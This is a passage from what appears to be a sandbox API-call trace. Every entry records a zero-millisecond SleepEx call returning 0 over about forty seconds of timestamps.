(dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.660] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0264.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.954] 